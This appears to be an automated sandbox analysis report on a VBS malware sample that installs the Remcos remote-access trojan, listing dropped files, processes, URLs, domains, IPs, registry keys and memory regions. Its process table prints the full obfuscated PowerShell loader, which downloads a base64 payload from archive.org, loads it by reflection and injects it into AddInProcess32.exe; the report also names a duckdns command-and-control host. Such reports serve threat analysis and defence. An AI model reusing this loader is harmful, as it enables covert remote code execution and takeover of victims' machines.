Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
OIQ1ybtQdW.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_131jske2.2rf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b21pzokz.ey2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jufgqjkt.stg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yd2ofkty.lqr.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt
= (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly
= ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod
= w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3
,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
23spt.duckdns.org
|
|
||
|
https://paste.ee/d/nJcWp/0
|
188.114.96.3
|
|
|
|
http://schemas.dmt
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVw3;w1Zbase64Content
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://ia600100.us.arX
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://ia600100.us.archive.org/
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
|
207.241.227.240
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://ia600100.us.archive.org
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://crl.v
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://ia600100.us.archive.org
|
unknown
|
There are 27 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
23spt.duckdns.org
|
192.169.69.26
|
|
|
|
paste.ee
|
188.114.96.3
|
|
|
|
ia600100.us.archive.org
|
207.241.227.240
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.96.3
|
paste.ee
|
European Union
|
|
|
|
192.169.69.26
|
23spt.duckdns.org
|
United States
|
|
|
|
207.241.227.240
|
ia600100.us.archive.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-DCR6HW
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-DCR6HW
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-DCR6HW
|
time
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
208F3A4C000
|
trusted library allocation
|
page read and write
|
|
|
|
208FBA90000
|
trusted library section
|
page read and write
|
|
|
|
458000
|
remote allocation
|
page execute and read and write
|
|
|
|
208F44E5000
|
trusted library allocation
|
page read and write
|
|
|
|
BE7000
|
heap
|
page read and write
|
|
|
|
208F34A3000
|
trusted library allocation
|
page read and write
|
|
|
|
BB8000
|
heap
|
page read and write
|
|
|
|
268E000
|
stack
|
page read and write
|
|
|
|
1D786870000
|
heap
|
page read and write
|
||
|
1C4651C0000
|
heap
|
page read and write
|
||
|
1D788964000
|
heap
|
page read and write
|
||
|
1C4653A0000
|
heap
|
page read and write
|
||
|
7FFE7E320000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E620000
|
trusted library allocation
|
page read and write
|
||
|
208E3150000
|
trusted library allocation
|
page read and write
|
||
|
1C47F462000
|
heap
|
page read and write
|
||
|
208E13C6000
|
heap
|
page read and write
|
||
|
1D7886EB000
|
heap
|
page read and write
|
||
|
47D000
|
remote allocation
|
page execute and read and write
|
||
|
1C465400000
|
trusted library allocation
|
page read and write
|
||
|
208E4B58000
|
trusted library allocation
|
page read and write
|
||
|
1D788AE1000
|
heap
|
page read and write
|
||
|
1D788863000
|
heap
|
page read and write
|
||
|
1D788808000
|
heap
|
page read and write
|
||
|
7FFE7E4F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BCEFF000
|
stack
|
page read and write
|
||
|
1C46743D000
|
trusted library allocation
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
208E4FE3000
|
trusted library allocation
|
page read and write
|
||
|
AC0000
|
heap
|
page read and write
|
||
|
7FFE7E3EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7E3CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D78885A000
|
heap
|
page read and write
|
||
|
208E3A66000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E4CA000
|
trusted library allocation
|
page read and write
|
||
|
1C4654D0000
|
heap
|
page read and write
|
||
|
7FFE7E334000
|
trusted library allocation
|
page read and write
|
||
|
208FB4B4000
|
heap
|
page read and write
|
||
|
EA7317F000
|
stack
|
page read and write
|
||
|
7FFE7E590000
|
trusted library allocation
|
page read and write
|
||
|
1BD37F000
|
stack
|
page read and write
|
||
|
1C46520E000
|
heap
|
page read and write
|
||
|
208E13DE000
|
heap
|
page read and write
|
||
|
1D788AAE000
|
heap
|
page read and write
|
||
|
1C4677DA000
|
trusted library allocation
|
page read and write
|
||
|
1D78874B000
|
heap
|
page read and write
|
||
|
7FFE7E4C4000
|
trusted library allocation
|
page read and write
|
||
|
1D78686F000
|
heap
|
page read and write
|
||
|
1D7868EC000
|
heap
|
page read and write
|
||
|
8CF21FE000
|
stack
|
page read and write
|
||
|
7FFE7E690000
|
trusted library allocation
|
page read and write
|
||
|
1C4653E0000
|
trusted library allocation
|
page read and write
|
||
|
1C4654D5000
|
heap
|
page read and write
|
||
|
7FFE7E610000
|
trusted library allocation
|
page read and write
|
||
|
1C4673E7000
|
trusted library allocation
|
page read and write
|
||
|
1D788712000
|
heap
|
page read and write
|
||
|
208E3CAC000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E570000
|
trusted library allocation
|
page read and write
|
||
|
8CF1BFE000
|
stack
|
page read and write
|
||
|
2CCF000
|
stack
|
page read and write
|
||
|
1D7886E1000
|
heap
|
page read and write
|
||
|
208E13A9000
|
heap
|
page read and write
|
||
|
1C47F420000
|
heap
|
page read and write
|
||
|
7FFE7E312000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E31D000
|
trusted library allocation
|
page execute and read and write
|
||
|
EA72DFE000
|
stack
|
page read and write
|
||
|
1C467816000
|
trusted library allocation
|
page read and write
|
||
|
1D7882A0000
|
heap
|
page read and write
|
||
|
1D7887E9000
|
heap
|
page read and write
|
||
|
7FFE7E5B0000
|
trusted library allocation
|
page read and write
|
||
|
208E3420000
|
heap
|
page execute and read and write
|
||
|
1C4671B7000
|
heap
|
page execute and read and write
|
||
|
1D788712000
|
heap
|
page read and write
|
||
|
1C4651D3000
|
heap
|
page read and write
|
||
|
7FFE7E4E1000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E5F0000
|
trusted library allocation
|
page read and write
|
||
|
208E3180000
|
trusted library allocation
|
page read and write
|
||
|
1D788723000
|
heap
|
page read and write
|
||
|
208E15B5000
|
heap
|
page read and write
|
||
|
1C4772E1000
|
trusted library allocation
|
page read and write
|
||
|
208E1390000
|
heap
|
page read and write
|
||
|
7FFE7E6B1000
|
trusted library allocation
|
page read and write
|
||
|
1D78875D000
|
heap
|
page read and write
|
||
|
1C47F472000
|
heap
|
page read and write
|
||
|
2BCE000
|
stack
|
page read and write
|
||
|
7FFE7E6D3000
|
trusted library allocation
|
page read and write
|
||
|
208E4B4A000
|
trusted library allocation
|
page read and write
|
||
|
1D7868FA000
|
heap
|
page read and write
|
||
|
1D788717000
|
heap
|
page read and write
|
||
|
7FFE7E3F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C46720E000
|
heap
|
page read and write
|
||
|
208E31C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E650000
|
trusted library allocation
|
page read and write
|
||
|
1D788974000
|
heap
|
page read and write
|
||
|
1C465150000
|
heap
|
page read and write
|
||
|
1D7887EC000
|
heap
|
page read and write
|
||
|
208E32A0000
|
heap
|
page read and write
|
||
|
1C47F400000
|
heap
|
page execute and read and write
|
||
|
7FFE7E630000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E332000
|
trusted library allocation
|
page read and write
|
||
|
1C465200000
|
heap
|
page read and write
|
||
|
1C46737B000
|
trusted library allocation
|
page read and write
|
||
|
208FB4EC000
|
heap
|
page read and write
|
||
|
1D7886E7000
|
heap
|
page read and write
|
||
|
1BD179000
|
stack
|
page read and write
|
||
|
7FFE7E4EA000
|
trusted library allocation
|
page read and write
|
||
|
1D78875D000
|
heap
|
page read and write
|
||
|
1C4772F0000
|
trusted library allocation
|
page read and write
|
||
|
1C46721A000
|
heap
|
page read and write
|
||
|
7FFE7E530000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E3C0000
|
trusted library allocation
|
page read and write
|
||
|
A0E000
|
stack
|
page read and write
|
||
|
1BCBCE000
|
stack
|
page read and write
|
||
|
7FFE7E5D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E580000
|
trusted library allocation
|
page read and write
|
||
|
1D788A8B000
|
heap
|
page read and write
|
||
|
208E381F000
|
trusted library allocation
|
page read and write
|
||
|
474000
|
remote allocation
|
page execute and read and write
|
||
|
1C4673FE000
|
trusted library allocation
|
page read and write
|
||
|
208E1496000
|
heap
|
page read and write
|
||
|
1D788A66000
|
heap
|
page read and write
|
||
|
7FFE7E620000
|
trusted library allocation
|
page read and write
|
||
|
EA72F77000
|
stack
|
page read and write
|
||
|
208E32B6000
|
heap
|
page read and write
|
||
|
1BD0FE000
|
stack
|
page read and write
|
||
|
208E13FE000
|
heap
|
page read and write
|
||
|
1D788743000
|
heap
|
page read and write
|
||
|
1C4672AC000
|
heap
|
page read and write
|
||
|
1D788B9E000
|
heap
|
page read and write
|
||
|
208E1590000
|
heap
|
page read and write
|
||
|
1D788863000
|
heap
|
page read and write
|
||
|
208FB4BB000
|
heap
|
page read and write
|
||
|
208E33C0000
|
heap
|
page execute and read and write
|
||
|
208E4B5C000
|
trusted library allocation
|
page read and write
|
||
|
294D000
|
stack
|
page read and write
|
||
|
8CF22FF000
|
stack
|
page read and write
|
||
|
208E3A3F000
|
trusted library allocation
|
page read and write
|
||
|
208E34AC000
|
trusted library allocation
|
page read and write
|
||
|
1D7887E0000
|
heap
|
page read and write
|
||
|
208E2D80000
|
heap
|
page read and write
|
||
|
7FFE7E3E0000
|
trusted library allocation
|
page read and write
|
||
|
1D7886F2000
|
heap
|
page read and write
|
||
|
208E4B80000
|
trusted library allocation
|
page read and write
|
||
|
1C4672E1000
|
trusted library allocation
|
page read and write
|
||
|
1D786866000
|
heap
|
page read and write
|
||
|
1D7886E0000
|
heap
|
page read and write
|
||
|
1D788963000
|
heap
|
page read and write
|
||
|
1D788A91000
|
heap
|
page read and write
|
||
|
7FFE7E313000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C4673E4000
|
trusted library allocation
|
page read and write
|
||
|
2E0F000
|
stack
|
page read and write
|
||
|
1C467782000
|
trusted library allocation
|
page read and write
|
||
|
2A4F000
|
stack
|
page read and write
|
||
|
1D788960000
|
heap
|
page read and write
|
||
|
EA729DE000
|
stack
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
1C47F477000
|
heap
|
page read and write
|
||
|
1D788702000
|
heap
|
page read and write
|
||
|
1D788962000
|
heap
|
page read and write
|
||
|
1D786A10000
|
heap
|
page read and write
|
||
|
1D78875D000
|
heap
|
page read and write
|
||
|
7FFE7E600000
|
trusted library allocation
|
page read and write
|
||
|
208E3834000
|
trusted library allocation
|
page read and write
|
||
|
208FB527000
|
heap
|
page read and write
|
||
|
208F3440000
|
trusted library allocation
|
page read and write
|
||
|
208FB468000
|
heap
|
page read and write
|
||
|
1D788AE0000
|
heap
|
page read and write
|
||
|
1C465160000
|
heap
|
page read and write
|
||
|
208E50AD000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E640000
|
trusted library allocation
|
page read and write
|
||
|
A90000
|
heap
|
page read and write
|
||
|
1D786838000
|
heap
|
page read and write
|
||
|
7FFE7E450000
|
trusted library allocation
|
page execute and read and write
|
||
|
EA72EF9000
|
stack
|
page read and write
|
||
|
1D78875D000
|
heap
|
page read and write
|
||
|
EA732FB000
|
stack
|
page read and write
|
||
|
1D788A78000
|
heap
|
page read and write
|
||
|
1D788825000
|
heap
|
page read and write
|
||
|
7FFE7E5E0000
|
trusted library allocation
|
page read and write
|
||
|
1C4672FB000
|
trusted library allocation
|
page read and write
|
||
|
1C4652B1000
|
heap
|
page read and write
|
||
|
1D788750000
|
heap
|
page read and write
|
||
|
2D0E000
|
stack
|
page read and write
|
||
|
7FFE7E512000
|
trusted library allocation
|
page read and write
|
||
|
1C4671C0000
|
heap
|
page read and write
|
||
|
1C46734B000
|
trusted library allocation
|
page read and write
|
||
|
208FB5A0000
|
heap
|
page read and write
|
||
|
208FB430000
|
heap
|
page read and write
|
||
|
208E13EA000
|
heap
|
page read and write
|
||
|
208E383C000
|
trusted library allocation
|
page read and write
|
||
|
1C4673EA000
|
trusted library allocation
|
page read and write
|
||
|
1D788AD5000
|
heap
|
page read and write
|
||
|
208FB6C4000
|
heap
|
page read and write
|
||
|
1C467287000
|
heap
|
page read and write
|
||
|
1C465220000
|
heap
|
page read and write
|
||
|
1C4672D0000
|
heap
|
page execute and read and write
|
||
|
1C465410000
|
heap
|
page readonly
|
||
|
1C4673FB000
|
trusted library allocation
|
page read and write
|
||
|
1C465202000
|
heap
|
page read and write
|
||
|
1D786830000
|
heap
|
page read and write
|
||
|
1BD2F8000
|
stack
|
page read and write
|
||
|
8FC000
|
stack
|
page read and write
|
||
|
258E000
|
stack
|
page read and write
|
||
|
1D788758000
|
heap
|
page read and write
|
||
|
1D788738000
|
heap
|
page read and write
|
||
|
1D78881D000
|
heap
|
page read and write
|
||
|
1D78896A000
|
heap
|
page read and write
|
||
|
1C477352000
|
trusted library allocation
|
page read and write
|
||
|
1C4677D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E314000
|
trusted library allocation
|
page read and write
|
||
|
1D7886E4000
|
heap
|
page read and write
|
||
|
1C467401000
|
trusted library allocation
|
page read and write
|
||
|
208E1570000
|
heap
|
page read and write
|
||
|
1D788A5D000
|
heap
|
page read and write
|
||
|
1BD27C000
|
stack
|
page read and write
|
||
|
7FFE7E34B000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E5A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E500000
|
trusted library allocation
|
page execute and read and write
|
||
|
8CF17BA000
|
stack
|
page read and write
|
||
|
AA5000
|
heap
|
page read and write
|
||
|
1C4671C5000
|
heap
|
page read and write
|
||
|
EA7291E000
|
stack
|
page read and write
|
||
|
1C46722A000
|
heap
|
page read and write
|
||
|
1BCF7C000
|
stack
|
page read and write
|
||
|
1D788980000
|
heap
|
page read and write
|
||
|
208FB5C0000
|
heap
|
page read and write
|
||
|
1D788838000
|
heap
|
page read and write
|
||
|
208E4E50000
|
trusted library allocation
|
page read and write
|
||
|
1D788B9E000
|
heap
|
page read and write
|
||
|
1D78884F000
|
heap
|
page read and write
|
||
|
208E46AC000
|
trusted library allocation
|
page read and write
|
||
|
208FB501000
|
heap
|
page read and write
|
||
|
1C467437000
|
trusted library allocation
|
page read and write
|
||
|
1C46524E000
|
heap
|
page read and write
|
||
|
8CF20FD000
|
stack
|
page read and write
|
||
|
1D78685C000
|
heap
|
page read and write
|
||
|
7FFE7E5B0000
|
trusted library allocation
|
page read and write
|
||
|
208E1425000
|
heap
|
page read and write
|
||
|
1C4672A0000
|
heap
|
page read and write
|
||
|
208E3130000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E4E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D788A8A000
|
heap
|
page read and write
|
||
|
1D788853000
|
heap
|
page read and write
|
||
|
1D788728000
|
heap
|
page read and write
|
||
|
1C467332000
|
trusted library allocation
|
page read and write
|
||
|
208E13A0000
|
heap
|
page read and write
|
||
|
AB0000
|
heap
|
page read and write
|
||
|
1D788A70000
|
heap
|
page read and write
|
||
|
1D788AD7000
|
heap
|
page read and write
|
||
|
7FFE7E510000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E5E0000
|
trusted library allocation
|
page read and write
|
||
|
208E4D22000
|
trusted library allocation
|
page read and write
|
||
|
478000
|
remote allocation
|
page execute and read and write
|
||
|
208E2DB5000
|
heap
|
page read and write
|
||
|
208E13E6000
|
heap
|
page read and write
|
||
|
208FB6EF000
|
heap
|
page read and write
|
||
|
1C4677D6000
|
trusted library allocation
|
page read and write
|
||
|
EA73CCE000
|
stack
|
page read and write
|
||
|
1BD57B000
|
stack
|
page read and write
|
||
|
1C47F740000
|
heap
|
page read and write
|
||
|
208F444C000
|
trusted library allocation
|
page read and write
|
||
|
1D788863000
|
heap
|
page read and write
|
||
|
208F3431000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E5C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E520000
|
trusted library allocation
|
page read and write
|
||
|
1D786930000
|
heap
|
page read and write
|
||
|
1D788AAE000
|
heap
|
page read and write
|
||
|
7FFE7E3C6000
|
trusted library allocation
|
page read and write
|
||
|
208FB4B9000
|
heap
|
page read and write
|
||
|
EA7307C000
|
stack
|
page read and write
|
||
|
1D788828000
|
heap
|
page read and write
|
||
|
EA7299E000
|
stack
|
page read and write
|
||
|
7FFE7E580000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E520000
|
trusted library allocation
|
page execute and read and write
|
||
|
EA730FE000
|
stack
|
page read and write
|
||
|
208E2DB0000
|
heap
|
page read and write
|
||
|
7FFE7E550000
|
trusted library allocation
|
page read and write
|
||
|
1C4653B0000
|
heap
|
page read and write
|
||
|
1C4651C9000
|
heap
|
page read and write
|
||
|
EA72893000
|
stack
|
page read and write
|
||
|
1D7889E1000
|
heap
|
page read and write
|
||
|
7FFE7E3D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D788707000
|
heap
|
page read and write
|
||
|
208E50A8000
|
trusted library allocation
|
page read and write
|
||
|
1D788858000
|
heap
|
page read and write
|
||
|
7FFE7E610000
|
trusted library allocation
|
page read and write
|
||
|
208E3829000
|
trusted library allocation
|
page read and write
|
||
|
1D78882D000
|
heap
|
page read and write
|
||
|
1BD4FF000
|
stack
|
page read and write
|
||
|
1BCB8E000
|
stack
|
page read and write
|
||
|
7FFE7E6C4000
|
trusted library allocation
|
page read and write
|
||
|
1D7886F7000
|
heap
|
page read and write
|
||
|
208E4D04000
|
trusted library allocation
|
page read and write
|
||
|
1BD07E000
|
stack
|
page read and write
|
||
|
EA731FE000
|
stack
|
page read and write
|
||
|
208E15BE000
|
heap
|
page read and write
|
||
|
26CC000
|
stack
|
page read and write
|
||
|
1BD1F6000
|
stack
|
page read and write
|
||
|
7FFE7E5C0000
|
trusted library allocation
|
page read and write
|
||
|
1C465180000
|
heap
|
page read and write
|
||
|
7FFE7E550000
|
trusted library allocation
|
page read and write
|
||
|
208F371D000
|
trusted library allocation
|
page read and write
|
||
|
1D786867000
|
heap
|
page read and write
|
||
|
EA72C7E000
|
stack
|
page read and write
|
||
|
1D7868FB000
|
heap
|
page read and write
|
||
|
1D78870B000
|
heap
|
page read and write
|
||
|
1C4678E6000
|
trusted library allocation
|
page read and write
|
||
|
8CF1DFE000
|
stack
|
page read and write
|
||
|
7FFE7E340000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E540000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E6D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E660000
|
trusted library allocation
|
page read and write
|
||
|
1D786A75000
|
heap
|
page read and write
|
||
|
1D786861000
|
heap
|
page read and write
|
||
|
1D788960000
|
heap
|
page read and write
|
||
|
7FFE7E560000
|
trusted library allocation
|
page read and write
|
||
|
1C4653A6000
|
heap
|
page read and write
|
||
|
EA72FF8000
|
stack
|
page read and write
|
||
|
1D788733000
|
heap
|
page read and write
|
||
|
1D788748000
|
heap
|
page read and write
|
||
|
7FFE7E4C1000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E560000
|
trusted library allocation
|
page read and write
|
||
|
208F372C000
|
trusted library allocation
|
page read and write
|
||
|
8CF23FC000
|
stack
|
page read and write
|
||
|
1BCB0E000
|
stack
|
page read and write
|
||
|
208FBA80000
|
heap
|
page read and write
|
||
|
7FFE7E330000
|
trusted library allocation
|
page read and write
|
||
|
208E15B0000
|
heap
|
page read and write
|
||
|
208E3863000
|
trusted library allocation
|
page read and write
|
||
|
1D788828000
|
heap
|
page read and write
|
||
|
7DF459990000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7E540000
|
trusted library allocation
|
page read and write
|
||
|
208E4D60000
|
trusted library allocation
|
page read and write
|
||
|
EA72CFD000
|
stack
|
page read and write
|
||
|
1C46520A000
|
heap
|
page read and write
|
||
|
1D788966000
|
heap
|
page read and write
|
||
|
208E385F000
|
trusted library allocation
|
page read and write
|
||
|
1D78685F000
|
heap
|
page read and write
|
||
|
1C4670E0000
|
heap
|
page read and write
|
||
|
1D7886E3000
|
heap
|
page read and write
|
||
|
7FFE7E4B2000
|
trusted library allocation
|
page read and write
|
||
|
8CF1EFE000
|
stack
|
page read and write
|
||
|
1D788A90000
|
heap
|
page read and write
|
||
|
7FFE7E4F2000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E3E6000
|
trusted library allocation
|
page read and write
|
||
|
1D788730000
|
heap
|
page read and write
|
||
|
1D7887E1000
|
heap
|
page read and write
|
||
|
1C465208000
|
heap
|
page read and write
|
||
|
7FFE7E33D000
|
trusted library allocation
|
page execute and read and write
|
||
|
EA73D4D000
|
stack
|
page read and write
|
||
|
1C4671B0000
|
heap
|
